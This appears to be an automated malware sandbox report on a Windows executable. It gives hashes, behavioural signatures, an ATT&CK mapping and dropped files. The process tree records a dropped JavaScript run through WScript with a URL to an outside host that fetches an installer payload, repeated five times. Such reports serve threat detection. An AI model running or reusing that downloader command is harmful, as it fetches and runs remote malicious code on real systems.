ded55995480953866a7d1b1bc27ca1cfbd753a587b9e4c35c1bb844d2bed371d

Analysis

max time kernel
120s
max time network
121s
platform
windows7_x64
resource
win7-20240220-en
resource tags

arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
submitted
27-04-2024 12:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0338b8f476692ba4daf5fde5693a3819_JaffaCakes118.exe
Size

184KB
MD5

0338b8f476692ba4daf5fde5693a3819
SHA1

504777a0211073ddd83f1cbd0b1e13c7ec7d0c96
SHA256

ded55995480953866a7d1b1bc27ca1cfbd753a587b9e4c35c1bb844d2bed371d
SHA512

a63c0409192df8d6462c33a30917c4e6d35be985bedc3ca76a3af58da0354edd2b105416f6b30773abf8409764dd2b8c394b68aa9f63593e72a999106f48fc8c
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3pr:/7BSH8zUB+nGESaaRvoB7FJNndnKr

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	3060	WScript.exe
8	3060	WScript.exe
10	3060	WScript.exe
12	2456	WScript.exe
13	2456	WScript.exe
15	2500	WScript.exe
16	2500	WScript.exe
18	2224	WScript.exe
19	2224	WScript.exe
21	2316	WScript.exe
22	2316	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1660 wrote to memory of 3060	1660	0338b8f476692ba4daf5fde5693a3819_JaffaCakes118.exe	28
PID 1660 wrote to memory of 3060	1660	0338b8f476692ba4daf5fde5693a3819_JaffaCakes118.exe	28
PID 1660 wrote to memory of 3060	1660	0338b8f476692ba4daf5fde5693a3819_JaffaCakes118.exe	28
PID 1660 wrote to memory of 3060	1660	0338b8f476692ba4daf5fde5693a3819_JaffaCakes118.exe	28
PID 1660 wrote to memory of 2456	1660	0338b8f476692ba4daf5fde5693a3819_JaffaCakes118.exe	30
PID 1660 wrote to memory of 2456	1660	0338b8f476692ba4daf5fde5693a3819_JaffaCakes118.exe	30
PID 1660 wrote to memory of 2456	1660	0338b8f476692ba4daf5fde5693a3819_JaffaCakes118.exe	30
PID 1660 wrote to memory of 2456	1660	0338b8f476692ba4daf5fde5693a3819_JaffaCakes118.exe	30
PID 1660 wrote to memory of 2500	1660	0338b8f476692ba4daf5fde5693a3819_JaffaCakes118.exe	32
PID 1660 wrote to memory of 2500	1660	0338b8f476692ba4daf5fde5693a3819_JaffaCakes118.exe	32
PID 1660 wrote to memory of 2500	1660	0338b8f476692ba4daf5fde5693a3819_JaffaCakes118.exe	32
PID 1660 wrote to memory of 2500	1660	0338b8f476692ba4daf5fde5693a3819_JaffaCakes118.exe	32
PID 1660 wrote to memory of 2224	1660	0338b8f476692ba4daf5fde5693a3819_JaffaCakes118.exe	34
PID 1660 wrote to memory of 2224	1660	0338b8f476692ba4daf5fde5693a3819_JaffaCakes118.exe	34
PID 1660 wrote to memory of 2224	1660	0338b8f476692ba4daf5fde5693a3819_JaffaCakes118.exe	34
PID 1660 wrote to memory of 2224	1660	0338b8f476692ba4daf5fde5693a3819_JaffaCakes118.exe	34
PID 1660 wrote to memory of 2316	1660	0338b8f476692ba4daf5fde5693a3819_JaffaCakes118.exe	36
PID 1660 wrote to memory of 2316	1660	0338b8f476692ba4daf5fde5693a3819_JaffaCakes118.exe	36
PID 1660 wrote to memory of 2316	1660	0338b8f476692ba4daf5fde5693a3819_JaffaCakes118.exe	36
PID 1660 wrote to memory of 2316	1660	0338b8f476692ba4daf5fde5693a3819_JaffaCakes118.exe	36

C:\Users\Admin\AppData\Local\Temp\0338b8f476692ba4daf5fde5693a3819_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\0338b8f476692ba4daf5fde5693a3819_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1660
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf16AC.js" http://www.djapp.info/?domain=voiTKaLRqZ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGL C:\Users\Admin\AppData\Local\Temp\fuf16AC.exe
  2⤵
  - Blocklisted process makes network request
  PID:3060
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf16AC.js" http://www.djapp.info/?domain=voiTKaLRqZ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGL C:\Users\Admin\AppData\Local\Temp\fuf16AC.exe
  2⤵
  - Blocklisted process makes network request
  PID:2456
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf16AC.js" http://www.djapp.info/?domain=voiTKaLRqZ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGL C:\Users\Admin\AppData\Local\Temp\fuf16AC.exe
  2⤵
  - Blocklisted process makes network request
  PID:2500
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf16AC.js" http://www.djapp.info/?domain=voiTKaLRqZ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGL C:\Users\Admin\AppData\Local\Temp\fuf16AC.exe
  2⤵
  - Blocklisted process makes network request
  PID:2224
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf16AC.js" http://www.djapp.info/?domain=voiTKaLRqZ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGL C:\Users\Admin\AppData\Local\Temp\fuf16AC.exe
  2⤵
  - Blocklisted process makes network request
  PID:2316

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
c35390cd7305291de0cfa7de08b0da99

SHA1
ccb6a65f324fbdadd872ca23d256ece85cce447d

SHA256
fc283d50ca01bbec2d1061d644d41108aa1d2e19d1b6858ccada4f1329710e51

SHA512
32c7b4b6250c6eb0d07859f195364f08655fb3567ca023d3c85e32f5d141adc4966f30fc11ee1607d0246ba91117e88917b58d9978e4b2edbfaffb3dc6fd7d59

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
620728b05906d6e042337fa941528b80

SHA1
241cff5cb14fcc50b07e6437c5b43e4d8d904a1f

SHA256
6a07078d350edb8cd5734ae1095e53bdabdd658d1bfe4ec73e4599ad54615178

SHA512
d0692618661710f5d9512e5ef39554b6a0ce100ebbfdeb666896256fcbb0e2eb0b67865a6efcadf755c3e84def90c27d09872fe29542a7e13f36dd13a82df967

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
c9cd13f9401d136097cc2d93bfe6decb

SHA1
83e856b33a90215a58eec3211386a5584f2ba1d0

SHA256
5ec03ce7f7147c54b837f88cbf90cbcc90192aaebdbd3d5cda51aaf1d9e0208e

SHA512
f9780deae07a6ed1d2be38b2c4e2b0be6a8e3b06aac290d30d2e4d9629a3f770aeadeee334e8cf6d6479a183b4d558ef380c9962610a2e2f705f6028bbd52025

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
c8a88fabaa1995bb68772f7d440bbf31

SHA1
7f941e54686150e2f9670b6d5ee6b1b747029190

SHA256
c88f13a6dc539f06418da60fe040a24e2c4291b35d4001fede4d7b3d0057f0d8

SHA512
749aa6a053ee9d1c0d284cafd545d8132fbe9622b63e4f14bbdc53b78052c0039ae7ec39966ca6ab3684eb4da1cbe39c0916b4c7b957b019c40fe1473f3fcaba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\domain_profile[1].htm

Filesize
6KB

MD5
84786dce36dcc592af26737b67cbefc9

SHA1
869007d6e8259a4d59a41574ca879f3ba6c232bc

SHA256
045e2d30f6fc9c5492285b5c2ad274288522f422e8d7e72518fb0fe03266fad9

SHA512
2016b71ff4d6a979010975e87a6435149027f9ac10c5149cfb15f394e1f86835c3570cfc992192295b6ce008d40d586f4f56d0c2c77ff7ba46acd7dfa4d23220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\domain_profile[1].htm

Filesize
6KB

MD5
1c6170f20ab79bfba54833abd497bfdb

SHA1
edcee15df5afef09f6cf26325214534cee9565ed

SHA256
a81f5561be49471c4369f084a9961f9a2b5804a7c575d23e91428571086518c2

SHA512
f9ee3ee6b8242ea384682692b25fb2bade85d909daba76607090215068bafb8af4f16ec3c61bcdce85c472ecde2663b94b9e6b2abb231bf6260fd92cef2a3a95

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RYNL6UIN\domain_profile[1].htm

Filesize
6KB

MD5
e0e97a4e82362d1a48332fb8423d3127

SHA1
b2e14aeaea9a193bccf8a31c51fcd0c77cb2bba2

SHA256
91191f668d4ee6ce078ef791a10767aa52dfb8189bebd9cfbaeec6afe4495413

SHA512
921471ecb0827e2835387236fa4012c426fb8b308f4192af802af0cfa1c8cb14d319d0d3f1cd983cf0051b34197fa517e7bf827aceeb8024d108e76d9ef18cae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RYNL6UIN\domain_profile[1].htm

Filesize
40KB

MD5
fe36a543ca6962d2d40440a1681f0987

SHA1
61a56499fed7159e885a983659224f9c0c06bc1e

SHA256
af698ab8bb4feb703a658236686d6d442c100a3a14159b70174e454920810673

SHA512
0c550f9651865057bcbc27568222f6302643b62babecc58657c0a3168d149e122ec82e39c537fe154d8fc32ce6cff9e1ef2af5f8cfb3474d9b65aa0bca93ea2f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab4653.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar5EA5.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf16AC.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\1EBAHAHH.txt

Filesize
175B

MD5
f0989c91d9418dac6cd078e0f9f8af5b

SHA1
a2789a93caee7cd9a45d50138dde4cdae8f7e9bd

SHA256
e00fad8422aa06254406429d31565a1a39e5cebe88068cca1aa79e076193f36e

SHA512
5b2dcd62e4aed17d9754a3843673397c3546766e288af30b5a8cd6f61db6f5fe02bfe2222dcb010be68bffa5ac9e020514d6a53e9db7a8d8eb2ec3883522c431

Download Submit